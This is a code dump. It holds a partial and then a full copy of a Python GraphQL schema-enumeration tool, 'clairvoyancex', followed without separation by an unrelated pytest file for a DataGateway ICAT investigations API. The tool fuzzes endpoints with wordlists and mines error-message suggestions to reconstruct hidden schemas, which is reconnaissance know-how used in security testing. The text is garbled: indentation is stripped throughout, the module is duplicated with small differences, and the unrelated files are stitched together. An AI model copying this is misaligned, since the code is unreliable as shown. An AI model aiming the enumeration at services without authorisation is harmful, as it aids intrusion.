and "has no subfields" in error_message
):
return set()
# First remove field if it produced an "Cannot query field" error
match = re.search(
'Cannot query field "(?P<invalid_field>[_A-Za-z][_0-9A-Za-z]*)"',
error_message,
)
if match:
valid_fields.discard(match.group("invalid_field"))
# Second obtain field suggestions from error message
valid_fields |= get_valid_fields(error_message)
return valid_fields
def probe_valid_args(
field: str, wordlist: Set, config: graphql.Config, input_document: str
) -> Set[str]:
valid_args = set(wordlist)
document = input_document.replace(
"FUZZ", f"{field}({", ".join([w + ": 7" for w in wordlist])})"
)
with graphql.new_client(
http2=config.http2,
verify=config.verify,
proxies=config.proxy,
timeout=config.timeout,
) as client:
try:
response = graphql.request(
client=client,
command=config.command,
url=config.url,
headers=config.headers,
params=config.params,
json={"query": document},
)
except ReadTimeout:
logging.warning('Timeout on function probe_valid_args with value '
+ f'{document=}. Try increasing timeout with option "-t". Skipping request')
return set()
else:
errors = response.json().get("errors", [])
for error in errors:
error_message = error["message"]
if (
"must not have a selection since type" in error_message
and "has no subfields" in error_message
):
return set()
# First remove arg if it produced an "Unknown argument" error
match = re.search(
'Unknown argument "(?P<invalid_arg>[_A-Za-z][_0-9A-Za-z]*)" on field "[_A-Za-z][_0-9A-Za-z.]*"',
error_message,
)
if match:
valid_args.discard(match.group("invalid_arg"))
# Second obtain args suggestions from error message
valid_args |= get_valid_args(error_message)
return valid_args
def probe_args(
field: str, wordlist: Set, config: graphql.Config, input_document: str
) -> Set[str]:
valid_args = set()
for i in range(0, len(wordlist), config.bucket_size):
bucket = wordlist[i : i + config.bucket_size]
valid_args |= probe_valid_args(field, bucket, config, input_document)
return valid_args
def get_valid_args(error_message: str) -> Set[str]:
valid_args = set()
skip_regexes = [
'Unknown argument "[_A-Za-z][_0-9A-Za-z]*" on field "[_A-Za-z][_0-9A-Za-z]*" of type "[_A-Za-z][_0-9A-Za-z]*".',
'Field "[_A-Za-z][_0-9A-Za-z]*" of type "[_A-Za-z\[\]!][a-zA-Z\[\]!]*" must have a selection of subfields. Did you mean "[_A-Za-z][_0-9A-Za-z]* \{ ... \}"\?',
'Field "[_A-Za-z][_0-9A-Za-z]*" argument "[_A-Za-z][_0-9A-Za-z]*" of type "[_A-Za-z\[\]!][_0-9a-zA-Z\[\]!]*" is required, but it was not provided.',
'Unknown argument "[_A-Za-z][_0-9A-Za-z]*" on field "[_A-Za-z][_0-9A-Za-z.]*"\.',
]
single_suggestion_regexes = [
'Unknown argument "[_0-9a-zA-Z\[\]!]*" on field "[_0-9a-zA-Z\[\]!]*" of type "[_0-9a-zA-Z\[\]!]*". Did you mean "(?P<arg>[_0-9a-zA-Z\[\]!]*)"\?'
]
double_suggestion_regexes = [
'Unknown argument "[_0-9a-zA-Z\[\]!]*" on field "[_0-9a-zA-Z\[\]!]*" of type "[_A-Za-z\[\]!][_0-9a-zA-Z\[\]!]*". Did you mean "(?P<first>[_0-9a-zA-Z\[\]!]*)" or "(?P<second>[_0-9a-zA-Z\[\]!]*)"\?'
]
for regex in skip_regexes:
if re.fullmatch(regex, error_message):
return set()
for regex in single_suggestion_regexes:
if re.fullmatch(regex, error_message):
match = re.fullmatch(regex, error_message)
valid_args.add(match.group("arg"))
for regex in double_suggestion_regexes:
match = re.fullmatch(regex, error_message)
if match:
valid_args.add(match.group("first"))
valid_args.add(match.group("second"))
if not valid_args:
logging.warning(f"Unknown error message: {error_message}")
return valid_args
def get_valid_input_fields(error_message: str) -> Set:
valid_fields = set()
single_suggestion_re = "Field [_0-9a-zA-Z\[\]!]*.(?P<field>[_0-9a-zA-Z\[\]!]*) of required type [_A-Za-z\[\]!][_0-9a-zA-Z\[\]!]* was not provided."
if re.fullmatch(single_suggestion_re, error_message):
match = re.fullmatch(single_suggestion_re, error_message)
if match.group("field"):
valid_fields.add(match.group("field"))
else:
logging.warning(f"Unknown error message: '{error_message}'")
return valid_fields
def probe_input_fields(
field: str, argument: str, wordlist: Set, config: graphql.Config
) -> Set[str]:
valid_input_fields = set(wordlist)
document = f"mutation {{ {field}({argument}: {{ {", ".join([w + ": 7" for w in wordlist])} }}) }}"
with graphql.new_client(
http2=config.http2,
verify=config.verify,
proxies=config.proxy,
timeout=config.timeout,
) as client:
try:
response = graphql.request(
client=client,
command=config.command,
url=config.url,
headers=config.headers,
params=config.params,
json={"query": document},
)
except ReadTimeout:
logging.warning('Timeout on function probe_input_fields with value '
+ f'{document=}. Try increasing timeout with option "-t". Skipping request.')
return set()
else:
errors = response.json().get("errors", [])
for error in errors:
error_message = error["message"]
# First remove field if it produced an error
match = re.search(
'Field "(?P<invalid_field>[_0-9a-zA-Z\[\]!]*)" is not defined by type [_0-9a-zA-Z\[\]!]*.',
error_message,
)
if match:
valid_input_fields.discard(match.group("invalid_field"))
# Second obtain field suggestions from error message
valid_input_fields |= get_valid_input_fields(error_message)
return valid_input_fields
def get_typeref(error_message: str, context: str) -> Optional[graphql.TypeRef]:
typeref = None
field_regexes = [
'Field "[_0-9a-zA-Z\[\]!]*" of type "(?P<typeref>[_A-Za-z\[\]!][_0-9a-zA-Z\[\]!]*)" must have a selection of subfields. Did you mean "[_0-9a-zA-Z\[\]!]* \{ ... \}"\?',
'Field "[_0-9a-zA-Z\[\]!]*" must not have a selection since type "(?P<typeref>[_A-Za-z\[\]!][_0-9a-zA-Z\[\]!]*)" has no subfields.',
'Cannot query field "[_0-9a-zA-Z\[\]!]*" on type "(?P<typeref>[_A-Za-z\[\]!][_0-9a-zA-Z\[\]!]*)".',
]
arg_regexes = [
'Field "[_0-9a-zA-Z\[\]!]*" argument "[_0-9a-zA-Z\[\]!]*" of type "(?P<typeref>[_A-Za-z\[\]!][_0-9a-zA-Z\[\]!]*)" is required, but it was not provided.',
"Expected type (?P<typeref>[_A-Za-z\[\]!][_0-9a-zA-Z\[\]!]*), found .+\.",
]
arg_skip_regexes = [
'Field "[_0-9a-zA-Z\[\]!]*" of type "[_A-Za-z\[\]!][_0-9a-zA-Z\[\]!]*" must have a selection of subfields\. Did you mean "[_0-9a-zA-Z\[\]!]* \{ \.\.\. \}"\?'
]
match = None
if context == "Field":
for regex in field_regexes:
if re.fullmatch(regex, error_message):
match = re.fullmatch(regex, error_message)
break
elif context == "InputValue":
for regex in arg_skip_regexes:
if re.fullmatch(regex, error_message):
return None
for regex in arg_regexes:
if re.fullmatch(regex, error_message):
match = re.fullmatch(regex, error_message)
break
if match:
tk = match.group("typeref")
name = tk.replace("!", "").replace("[", "").replace("]", "")
kind = ""
if name.endswith("Input"):
kind = "INPUT_OBJECT"
elif name in ["Int", "Float", "String", "Boolean", "ID"]:
kind = "SCALAR"
else:
kind = "OBJECT"
is_list = True if "[" and "]" in tk else False
non_null_item = True if is_list and "!]" in tk else False
non_null = True if tk.endswith("!") else False
typeref = graphql.TypeRef(
name=name,
kind=kind,
is_list=is_list,
non_null_item=non_null_item,
non_null=non_null,
)
else:
logging.warning(f"Unknown error message: '{error_message}'")
return typeref
def probe_typeref(
documents: List[str], context: str, config: graphql.Config
) -> Optional[graphql.TypeRef]:
typeref = None
with graphql.new_client(
http2=config.http2,
verify=config.verify,
proxies=config.proxy,
timeout=config.timeout,
) as client:
for document in documents:
try:
response = graphql.request(
client=client,
command=config.command,
url=config.url,
headers=config.headers,
params=config.params,
json={"query": document},
)
except ReadTimeout:
logging.warning('Timeout on function probe_typeref with value '
+ f'{document=}. Try increasing timeout with option "-t". Skipping request')
return None
else:
errors = response.json().get("errors", [])
for error in errors:
typeref = get_typeref(error["message"], context)
if typeref:
return typeref
if not typeref:
#raise Exception(f"Unable to get TypeRef for {documents}")
logging.error(f'Unable to get TypeRef for {documents}')
return None
def probe_field_type(
field: str, config: graphql.Config, input_document: str
) -> graphql.TypeRef:
documents = [
input_document.replace("FUZZ", f"{field}"),
input_document.replace("FUZZ", f"{field} {{ lol }}"),
]
typeref = probe_typeref(documents, "Field", config)
return typeref
def probe_arg_typeref(
field: str, arg: str, config: graphql.Config, input_document: str
) -> graphql.TypeRef:
documents = [
input_document.replace("FUZZ", f"{field}({arg}: 7)"),
input_document.replace("FUZZ", f"{field}({arg}: {{}})"),
input_document.replace("FUZZ", f"{field}({arg[:-1]}: 7)"),
]
typeref = probe_typeref(documents, "InputValue", config)
return typeref
def probe_typename(input_document: str, config: graphql.Config) -> str:
typename = ""
wrong_field = "imwrongfield"
document = input_document.replace("FUZZ", wrong_field)
with graphql.new_client(
http2=config.http2,
verify=config.verify,
proxies=config.proxy,
timeout=config.timeout,
) as client:
try:
response = graphql.request(
client=client,
command=config.command,
url=config.url,
headers=config.headers,
params=config.params,
json={"query": document},
)
except ReadTimeout:
logging.warning('Timeout on function probe_typename with value '
+ f'{document=}. Try increasing timeout with option "-t". Skipping request')
return None
else:
errors = response.json().get("errors", [])
wrong_field_regexes = [
f'Cannot query field "{wrong_field}" on type "(?P<typename>[_0-9a-zA-Z\[\]!]*)".',
f'Field "[_0-9a-zA-Z\[\]!]*" must not have a selection since type "(?P<typename>[_A-Za-z\[\]!][_0-9a-zA-Z\[\]!]*)" has no subfields.',
]
match = None
for regex in wrong_field_regexes:
for error in errors:
match = re.fullmatch(regex, error["message"])
if match:
break
if match:
break
if not match:
raise Exception(f"Expected '{errors}' to match any of '{wrong_field_regexes}'.")
typename = (
match.group("typename").replace("[", "").replace("]", "").replace("!", "")
)
return typename
def fetch_root_typenames(config: graphql.Config) -> Dict[str, Optional[str]]:
documents = {
"queryType": "query { __typename }",
"mutationType": "mutation { __typename }",
"subscriptionType": "subscription { __typename }",
}
typenames = {
"queryType": None,
"mutationType": None,
"subscriptionType": None,
}
with graphql.new_client(
http2=config.http2,
verify=config.verify,
proxies=config.proxy,
timeout=config.timeout,
) as client:
for name, document in documents.items():
try:
response = graphql.request(
client=client,
command=config.command,
url=config.url,
headers=config.headers,
params=config.params,
json={"query": document},
)
except ReadTimeout:
logging.warning('Timeout on function fetch_root_typenames with values '
+ f'{name=} and {document=}')
raise
try:
data = response.json().get("data", {})
except JSONDecodeError:
logging.error(f'Caught exception JSONDecodeError for request using values {name=} and {document=}')
else:
if data:
typenames[name] = data["__typename"]
logging.debug(f"Root typenames are: {typenames}")
return typenames
def clairvoyance(
wordlist: List[str],
config: graphql.Config,
input_schema: Dict[str, Any] = None,
input_document: str = None,
) -> Dict[str, Any]:
if not input_schema:
root_typenames = fetch_root_typenames(config)
schema = graphql.Schema(
queryType=root_typenames["queryType"],
mutationType=root_typenames["mutationType"],
subscriptionType=root_typenames["subscriptionType"],
)
else:
schema = graphql.Schema(schema=input_schema)
typename = probe_typename(input_document, config)
logging.debug(f"__typename = {typename}")
valid_mutation_fields = probe_valid_fields(wordlist, config, input_document)
logging.debug(f"{typename}.fields = {valid_mutation_fields}")
for field_name in valid_mutation_fields:
typeref = probe_field_type(field_name, config, input_document)
if typeref is None:
continue
field = graphql.Field(field_name, typeref)
if field.type.name not in ["Int", "Float", "String", "Boolean", "ID"]:
arg_names = probe_args(field.name, wordlist, config, input_document)
logging.debug(f"{typename}.{field_name}.args = {arg_names}")
for arg_name in arg_names:
arg_typeref = probe_arg_typeref(
field.name, arg_name, config, input_document
)
if arg_typeref is None:
continue
arg = graphql.InputValue(arg_name, arg_typeref)
field.args.append(arg)
schema.add_type(arg.type.name, "INPUT_OBJECT")
else:
logging.debug(
f"Skip probe_args() for '{field.name}' of type '{field.type.name}'"
)
schema.types[typename].fields.append(field)
schema.add_type(field.type.name, "OBJECT")
return schema.to_json()
| import re
import logging
from typing import Any
from typing import Set
from typing import List
from typing import Dict
from typing import Optional
from httpx import ReadTimeout
from json.decoder import JSONDecodeError
from clairvoyancex import graphql
def get_valid_fields(error_message: str) -> Set:
valid_fields = set()
multiple_suggestions_re = 'Cannot query field "([_A-Za-z][_0-9A-Za-z]*)" on type "[_A-Za-z][_0-9A-Za-z]*". Did you mean (?P<multi>("[_A-Za-z][_0-9A-Za-z]*", )+)(or "(?P<last>[_A-Za-z][_0-9A-Za-z]*)")?\?'
or_suggestion_re = 'Cannot query field "[_A-Za-z][_0-9A-Za-z]*" on type "[_A-Za-z][_0-9A-Za-z]*". Did you mean "(?P<one>[_A-Za-z][_0-9A-Za-z]*)" or "(?P<two>[_A-Za-z][_0-9A-Za-z]*)"\?'
single_suggestion_re = 'Cannot query field "([_A-Za-z][_0-9A-Za-z]*)" on type "[_A-Za-z][_0-9A-Za-z]*". Did you mean "(?P<field>[_A-Za-z][_0-9A-Za-z]*)"\?'
invalid_field_re = (
'Cannot query field "[_A-Za-z][_0-9A-Za-z]*" on type "[_A-Za-z][_0-9A-Za-z]*".'
)
# TODO: this regex here more than one time, make it shared?
valid_field_regexes = [
'Field "(?P<field>[_A-Za-z][_0-9A-Za-z]*)" of type "(?P<typeref>[_A-Za-z\[\]!][_0-9a-zA-Z\[\]!]*)" must have a selection of subfields. Did you mean "[_A-Za-z][_0-9A-Za-z]* \{ ... \}"\?',
]
no_fields_regex = 'Field "[_A-Za-z][_0-9A-Za-z]*" must not have a selection since type "[0-9a-zA-Z\[\]!]+" has no subfields.'
if re.fullmatch(no_fields_regex, error_message):
return valid_fields
if re.fullmatch(multiple_suggestions_re, error_message):
match = re.fullmatch(multiple_suggestions_re, error_message)
for m in match.group("multi").split(", "):
if m:
valid_fields.add(m.strip('"'))
if match.group("last"):
valid_fields.add(match.group("last"))
elif re.fullmatch(or_suggestion_re, error_message):
match = re.fullmatch(or_suggestion_re, error_message)
valid_fields.add(match.group("one"))
valid_fields.add(match.group("two"))
elif re.fullmatch(single_suggestion_re, error_message):
match = re.fullmatch(single_suggestion_re, error_message)
valid_fields.add(match.group("field"))
elif re.fullmatch(invalid_field_re, error_message):
pass
elif re.fullmatch(valid_field_regexes[0], error_message):
match = re.fullmatch(valid_field_regexes[0], error_message)
valid_fields.add(match.group("field"))
else:
logging.warning(f"Unknown error message: '{error_message}'")
return valid_fields
def probe_valid_fields(
wordlist: Set, config: graphql.Config, input_document: str
) -> Set[str]:
# We're assuming all fields from wordlist are valid,
# then remove fields that produce an error message
valid_fields = set(wordlist)
with graphql.new_client(
http2=config.http2,
verify=config.verify,
proxies=config.proxy,
timeout=config.timeout,
) as client:
for i in range(0, len(wordlist), config.bucket_size):
bucket = wordlist[i : i + config.bucket_size]
document = input_document.replace("FUZZ", " ".join(bucket))
# TODO: implement retries in case of failure
try:
response = graphql.request(
client=client,
command=config.command,
url=config.url,
headers=config.headers,
params=config.params,
json={"query": document},
)
except ReadTimeout:
logging.warning('Timeout on function probe_valid_fields with value '
+ f'{document=}. Try increasing timeout with option "-t". Skipping request')
continue
try:
errors = response.json().get("errors", [])
except JSONDecodeError:
logging.warning(f'Invalid response for request with {document=}')
continue
else:
logging.debug(
f"Sent {len(bucket)} fields, recieved {len(errors)} errors in {response.elapsed.total_seconds()} seconds"
)
for error in errors:
error_message = error["message"]
if (
"must not have a selection since type" in error_message
and "has no subfields" in error_message
):
return set()
# First remove field if it produced an "Cannot query field" error
match = re.search(
'Cannot query field "(?P<invalid_field>[_A-Za-z][_0-9A-Za-z]*)"',
error_message,
)
if match:
valid_fields.discard(match.group("invalid_field"))
# Second obtain field suggestions from error message
valid_fields |= get_valid_fields(error_message)
return valid_fields
def probe_valid_args(
field: str, wordlist: Set, config: graphql.Config, input_document: str
) -> Set[str]:
valid_args = set(wordlist)
document = input_document.replace(
"FUZZ", f"{field}({', '.join([w + ': 7' for w in wordlist])})"
)
with graphql.new_client(
http2=config.http2,
verify=config.verify,
proxies=config.proxy,
timeout=config.timeout,
) as client:
try:
response = graphql.request(
client=client,
command=config.command,
url=config.url,
headers=config.headers,
params=config.params,
json={"query": document},
)
except ReadTimeout:
logging.warning('Timeout on function probe_valid_args with value '
+ f'{document=}. Try increasing timeout with option "-t". Skipping request')
return set()
else:
errors = response.json().get("errors", [])
for error in errors:
error_message = error["message"]
if (
"must not have a selection since type" in error_message
and "has no subfields" in error_message
):
return set()
# First remove arg if it produced an "Unknown argument" error
match = re.search(
'Unknown argument "(?P<invalid_arg>[_A-Za-z][_0-9A-Za-z]*)" on field "[_A-Za-z][_0-9A-Za-z.]*"',
error_message,
)
if match:
valid_args.discard(match.group("invalid_arg"))
# Second obtain args suggestions from error message
valid_args |= get_valid_args(error_message)
return valid_args
def probe_args(
field: str, wordlist: Set, config: graphql.Config, input_document: str
) -> Set[str]:
valid_args = set()
for i in range(0, len(wordlist), config.bucket_size):
bucket = wordlist[i : i + config.bucket_size]
valid_args |= probe_valid_args(field, bucket, config, input_document)
return valid_args
def get_valid_args(error_message: str) -> Set[str]:
valid_args = set()
skip_regexes = [
'Unknown argument "[_A-Za-z][_0-9A-Za-z]*" on field "[_A-Za-z][_0-9A-Za-z]*" of type "[_A-Za-z][_0-9A-Za-z]*".',
'Field "[_A-Za-z][_0-9A-Za-z]*" of type "[_A-Za-z\[\]!][a-zA-Z\[\]!]*" must have a selection of subfields. Did you mean "[_A-Za-z][_0-9A-Za-z]* \{ ... \}"\?',
'Field "[_A-Za-z][_0-9A-Za-z]*" argument "[_A-Za-z][_0-9A-Za-z]*" of type "[_A-Za-z\[\]!][_0-9a-zA-Z\[\]!]*" is required, but it was not provided.',
'Unknown argument "[_A-Za-z][_0-9A-Za-z]*" on field "[_A-Za-z][_0-9A-Za-z.]*"\.',
]
single_suggestion_regexes = [
'Unknown argument "[_0-9a-zA-Z\[\]!]*" on field "[_0-9a-zA-Z\[\]!]*" of type "[_0-9a-zA-Z\[\]!]*". Did you mean "(?P<arg>[_0-9a-zA-Z\[\]!]*)"\?'
]
double_suggestion_regexes = [
'Unknown argument "[_0-9a-zA-Z\[\]!]*" on field "[_0-9a-zA-Z\[\]!]*" of type "[_A-Za-z\[\]!][_0-9a-zA-Z\[\]!]*". Did you mean "(?P<first>[_0-9a-zA-Z\[\]!]*)" or "(?P<second>[_0-9a-zA-Z\[\]!]*)"\?'
]
for regex in skip_regexes:
if re.fullmatch(regex, error_message):
return set()
for regex in single_suggestion_regexes:
if re.fullmatch(regex, error_message):
match = re.fullmatch(regex, error_message)
valid_args.add(match.group("arg"))
for regex in double_suggestion_regexes:
match = re.fullmatch(regex, error_message)
if match:
valid_args.add(match.group("first"))
valid_args.add(match.group("second"))
if not valid_args:
logging.warning(f"Unknown error message: {error_message}")
return valid_args
def get_valid_input_fields(error_message: str) -> Set:
valid_fields = set()
single_suggestion_re = "Field [_0-9a-zA-Z\[\]!]*.(?P<field>[_0-9a-zA-Z\[\]!]*) of required type [_A-Za-z\[\]!][_0-9a-zA-Z\[\]!]* was not provided."
if re.fullmatch(single_suggestion_re, error_message):
match = re.fullmatch(single_suggestion_re, error_message)
if match.group("field"):
valid_fields.add(match.group("field"))
else:
logging.warning(f"Unknown error message: '{error_message}'")
return valid_fields
def probe_input_fields(
field: str, argument: str, wordlist: Set, config: graphql.Config
) -> Set[str]:
valid_input_fields = set(wordlist)
document = f"mutation {{ {field}({argument}: {{ {', '.join([w + ': 7' for w in wordlist])} }}) }}"
with graphql.new_client(
http2=config.http2,
verify=config.verify,
proxies=config.proxy,
timeout=config.timeout,
) as client:
try:
response = graphql.request(
client=client,
command=config.command,
url=config.url,
headers=config.headers,
params=config.params,
json={"query": document},
)
except ReadTimeout:
logging.warning('Timeout on function probe_input_fields with value '
+ f'{document=}. Try increasing timeout with option "-t". Skipping request.')
return set()
else:
errors = response.json().get("errors", [])
for error in errors:
error_message = error["message"]
# First remove field if it produced an error
match = re.search(
'Field "(?P<invalid_field>[_0-9a-zA-Z\[\]!]*)" is not defined by type [_0-9a-zA-Z\[\]!]*.',
error_message,
)
if match:
valid_input_fields.discard(match.group("invalid_field"))
# Second obtain field suggestions from error message
valid_input_fields |= get_valid_input_fields(error_message)
return valid_input_fields
def get_typeref(error_message: str, context: str) -> Optional[graphql.TypeRef]:
typeref = None
field_regexes = [
'Field "[_0-9a-zA-Z\[\]!]*" of type "(?P<typeref>[_A-Za-z\[\]!][_0-9a-zA-Z\[\]!]*)" must have a selection of subfields. Did you mean "[_0-9a-zA-Z\[\]!]* \{ ... \}"\?',
'Field "[_0-9a-zA-Z\[\]!]*" must not have a selection since type "(?P<typeref>[_A-Za-z\[\]!][_0-9a-zA-Z\[\]!]*)" has no subfields.',
'Cannot query field "[_0-9a-zA-Z\[\]!]*" on type "(?P<typeref>[_A-Za-z\[\]!][_0-9a-zA-Z\[\]!]*)".',
]
arg_regexes = [
'Field "[_0-9a-zA-Z\[\]!]*" argument "[_0-9a-zA-Z\[\]!]*" of type "(?P<typeref>[_A-Za-z\[\]!][_0-9a-zA-Z\[\]!]*)" is required, but it was not provided.',
"Expected type (?P<typeref>[_A-Za-z\[\]!][_0-9a-zA-Z\[\]!]*), found .+\.",
]
arg_skip_regexes = [
'Field "[_0-9a-zA-Z\[\]!]*" of type "[_A-Za-z\[\]!][_0-9a-zA-Z\[\]!]*" must have a selection of subfields\. Did you mean "[_0-9a-zA-Z\[\]!]* \{ \.\.\. \}"\?'
]
match = None
if context == "Field":
for regex in field_regexes:
if re.fullmatch(regex, error_message):
match = re.fullmatch(regex, error_message)
break
elif context == "InputValue":
for regex in arg_skip_regexes:
if re.fullmatch(regex, error_message):
return None
for regex in arg_regexes:
if re.fullmatch(regex, error_message):
match = re.fullmatch(regex, error_message)
break
if match:
tk = match.group("typeref")
name = tk.replace("!", "").replace("[", "").replace("]", "")
kind = ""
if name.endswith("Input"):
kind = "INPUT_OBJECT"
elif name in ["Int", "Float", "String", "Boolean", "ID"]:
kind = "SCALAR"
else:
kind = "OBJECT"
is_list = True if "[" and "]" in tk else False
non_null_item = True if is_list and "!]" in tk else False
non_null = True if tk.endswith("!") else False
typeref = graphql.TypeRef(
name=name,
kind=kind,
is_list=is_list,
non_null_item=non_null_item,
non_null=non_null,
)
else:
logging.warning(f"Unknown error message: '{error_message}'")
return typeref
def probe_typeref(
documents: List[str], context: str, config: graphql.Config
) -> Optional[graphql.TypeRef]:
typeref = None
with graphql.new_client(
http2=config.http2,
verify=config.verify,
proxies=config.proxy,
timeout=config.timeout,
) as client:
for document in documents:
try:
response = graphql.request(
client=client,
command=config.command,
url=config.url,
headers=config.headers,
params=config.params,
json={"query": document},
)
except ReadTimeout:
logging.warning('Timeout on function probe_typeref with value '
+ f'{document=}. Try increasing timeout with option "-t". Skipping request')
return None
else:
errors = response.json().get("errors", [])
for error in errors:
typeref = get_typeref(error["message"], context)
if typeref:
return typeref
if not typeref:
#raise Exception(f"Unable to get TypeRef for {documents}")
logging.error(f'Unable to get TypeRef for {documents}')
return None
def probe_field_type(
field: str, config: graphql.Config, input_document: str
) -> graphql.TypeRef:
documents = [
input_document.replace("FUZZ", f"{field}"),
input_document.replace("FUZZ", f"{field} {{ lol }}"),
]
typeref = probe_typeref(documents, "Field", config)
return typeref
def probe_arg_typeref(
field: str, arg: str, config: graphql.Config, input_document: str
) -> graphql.TypeRef:
documents = [
input_document.replace("FUZZ", f"{field}({arg}: 7)"),
input_document.replace("FUZZ", f"{field}({arg}: {{}})"),
input_document.replace("FUZZ", f"{field}({arg[:-1]}: 7)"),
]
typeref = probe_typeref(documents, "InputValue", config)
return typeref
def probe_typename(input_document: str, config: graphql.Config) -> str:
typename = ""
wrong_field = "imwrongfield"
document = input_document.replace("FUZZ", wrong_field)
with graphql.new_client(
http2=config.http2,
verify=config.verify,
proxies=config.proxy,
timeout=config.timeout,
) as client:
try:
response = graphql.request(
client=client,
command=config.command,
url=config.url,
headers=config.headers,
params=config.params,
json={"query": document},
)
except ReadTimeout:
logging.warning('Timeout on function probe_typename with value '
+ f'{document=}. Try increasing timeout with option "-t". Skipping request')
return None
else:
errors = response.json().get("errors", [])
wrong_field_regexes = [
f'Cannot query field "{wrong_field}" on type "(?P<typename>[_0-9a-zA-Z\[\]!]*)".',
f'Field "[_0-9a-zA-Z\[\]!]*" must not have a selection since type "(?P<typename>[_A-Za-z\[\]!][_0-9a-zA-Z\[\]!]*)" has no subfields.',
]
match = None
for regex in wrong_field_regexes:
for error in errors:
match = re.fullmatch(regex, error["message"])
if match:
break
if match:
break
if not match:
raise Exception(f"Expected '{errors}' to match any of '{wrong_field_regexes}'.")
typename = (
match.group("typename").replace("[", "").replace("]", "").replace("!", "")
)
return typename
def fetch_root_typenames(config: graphql.Config) -> Dict[str, Optional[str]]:
documents = {
"queryType": "query { __typename }",
"mutationType": "mutation { __typename }",
"subscriptionType": "subscription { __typename }",
}
typenames = {
"queryType": None,
"mutationType": None,
"subscriptionType": None,
}
with graphql.new_client(
http2=config.http2,
verify=config.verify,
proxies=config.proxy,
timeout=config.timeout,
) as client:
for name, document in documents.items():
try:
response = graphql.request(
client=client,
command=config.command,
url=config.url,
headers=config.headers,
params=config.params,
json={"query": document},
)
except ReadTimeout:
logging.warning('Timeout on function fetch_root_typenames with values '
+ f'{name=} and {document=}')
raise
try:
data = response.json().get("data", {})
except JSONDecodeError:
logging.error(f'Caught exception JSONDecodeError for request using values {name=} and {document=}')
else:
if data:
typenames[name] = data["__typename"]
logging.debug(f"Root typenames are: {typenames}")
return typenames
def clairvoyance(
wordlist: List[str],
config: graphql.Config,
input_schema: Dict[str, Any] = None,
input_document: str = None,
) -> Dict[str, Any]:
if not input_schema:
root_typenames = fetch_root_typenames(config)
schema = graphql.Schema(
queryType=root_typenames["queryType"],
mutationType=root_typenames["mutationType"],
subscriptionType=root_typenames["subscriptionType"],
)
else:
schema = graphql.Schema(schema=input_schema)
typename = probe_typename(input_document, config)
logging.debug(f"__typename = {typename}")
valid_mutation_fields = probe_valid_fields(wordlist, config, input_document)
logging.debug(f"{typename}.fields = {valid_mutation_fields}")
for field_name in valid_mutation_fields:
typeref = probe_field_type(field_name, config, input_document)
if typeref is None:
continue
field = graphql.Field(field_name, typeref)
if field.type.name not in ["Int", "Float", "String", "Boolean", "ID"]:
arg_names = probe_args(field.name, wordlist, config, input_document)
logging.debug(f"{typename}.{field_name}.args = {arg_names}")
for arg_name in arg_names:
arg_typeref = probe_arg_typeref(
field.name, arg_name, config, input_document
)
if arg_typeref is None:
continue
arg = graphql.InputValue(arg_name, arg_typeref)
field.args.append(arg)
schema.add_type(arg.type.name, "INPUT_OBJECT")
else:
logging.debug(
f"Skip probe_args() for '{field.name}' of type '{field.type.name}'"
)
schema.types[typename].fields.append(field)
schema.add_type(field.type.name, "OBJECT")
return schema.to_json()
|
import pytest
from test.icat.test_query import prepare_icat_data_for_assertion
class TestICATCreateData:
investigation_name_prefix = "Test Data for API Testing, Data Creation"
@pytest.mark.usefixtures("remove_test_created_investigation_data")
def test_valid_create_data(
self, flask_test_app_icat, valid_icat_credentials_header,
):
create_investigations_json = [
{
"name": f"{self.investigation_name_prefix} {i}",
"title": "Test data for the Python ICAT Backend on DataGateway API",
"summary": "Test data for DataGateway API testing",
"releaseDate": "2020-03-03 08:00:08+00:00",
"startDate": "2020-02-02 09:00:09+00:00",
"endDate": "2020-02-03 10:00:10+00:00",
"visitId": "Data Creation Visit",
"doi": "DataGateway API Test DOI",
"facility": 1,
"type": 1,
}
for i in range(2)
]
test_response = flask_test_app_icat.post(
"/investigations",
headers=valid_icat_credentials_header,
json=create_investigations_json,
)
for investigation_request in create_investigations_json:
investigation_request.pop("facility")
investigation_request.pop("type")
response_json = prepare_icat_data_for_assertion(
test_response.json, remove_id=True,
)
assert create_investigations_json == response_json
@pytest.mark.usefixtures("remove_test_created_investigation_data")
def test_valid_boundary_create_data(
self, flask_test_app_icat, valid_icat_credentials_header,
):
"""Create a single investigation, as opposed to multiple"""
create_investigation_json = {
"name": f"{self.investigation_name_prefix} 0",
"title": "Test data for the Python ICAT Backend on the API",
"summary": "Test data for DataGateway API testing",
"releaseDate": "2020-03-03 08:00:08+00:00",
"startDate": "2020-02-02 09:00:09+00:00",
"endDate": "2020-02-03 10:00:10+00:00",
"visitId": "Data Creation Visit",
"doi": "DataGateway API Test DOI",
"facility": 1,
"type": 1,
}
test_response = flask_test_app_icat.post(
"/investigations",
headers=valid_icat_credentials_header,
json=create_investigation_json,
)
create_investigation_json.pop("facility")
create_investigation_json.pop("type")
response_json = prepare_icat_data_for_assertion(
test_response.json, remove_id=True,
)
assert [create_investigation_json] == response_json
def test_invalid_create_data(
self, flask_test_app_icat, valid_icat_credentials_header,
):
"""An investigation requires a minimum of: name, visitId, facility, type"""
invalid_request_body = {
"title": "Test Title for DataGateway API Backend testing",
}
test_response = flask_test_app_icat.post(
"/investigations",
headers=valid_icat_credentials_header,
json=invalid_request_body,
)
assert test_response.status_code == 400
def test_invalid_existing_data_create(
self,
flask_test_app_icat,
valid_icat_credentials_header,
single_investigation_test_data,
):
"""This test targets raising ICATObjectExistsError, causing a 400"""
# entity.as_dict() removes details about facility and type, hence they're
# hardcoded here instead of using sinle_investigation_test_data
existing_object_json = {
"name": single_investigation_test_data[0]["name"],
"title": single_investigation_test_data[0]["title"],
"visitId": single_investigation_test_data[0]["visitId"],
"facility": 1,
"type": 1,
}
test_response = flask_test_app_icat.post(
"/investigations",
headers=valid_icat_credentials_header,
json=existing_object_json,
)
assert test_response.status_code == 400
def test_valid_rollback_behaviour(
self, flask_test_app_icat, valid_icat_credentials_header,
):
request_body = [
{
"name": "Test Investigation DG API Testing Name Test",
"title": "My New Investigation with Title",
"visitId": "Visit ID for Testing",
"facility": 1,
"type": 1,
},
{
"name": "Invalid Investigation for testing",
"title": "My New Investigation with Title",
"visitId": "Visit ID for Testing",
"doi": "_" * 256,
"facility": 1,
"type": 1,
},
]
create_response = flask_test_app_icat.post(
"/investigations", headers=valid_icat_credentials_header, json=request_body,
)
get_response = flask_test_app_icat.get(
'/investigations?where={"title": {"eq": "'
f'{request_body[0]['title']}'
'"}}',
headers=valid_icat_credentials_header,
)
get_response_json = prepare_icat_data_for_assertion(get_response.json)
assert create_response.status_code == 400
assert get_response_json == []
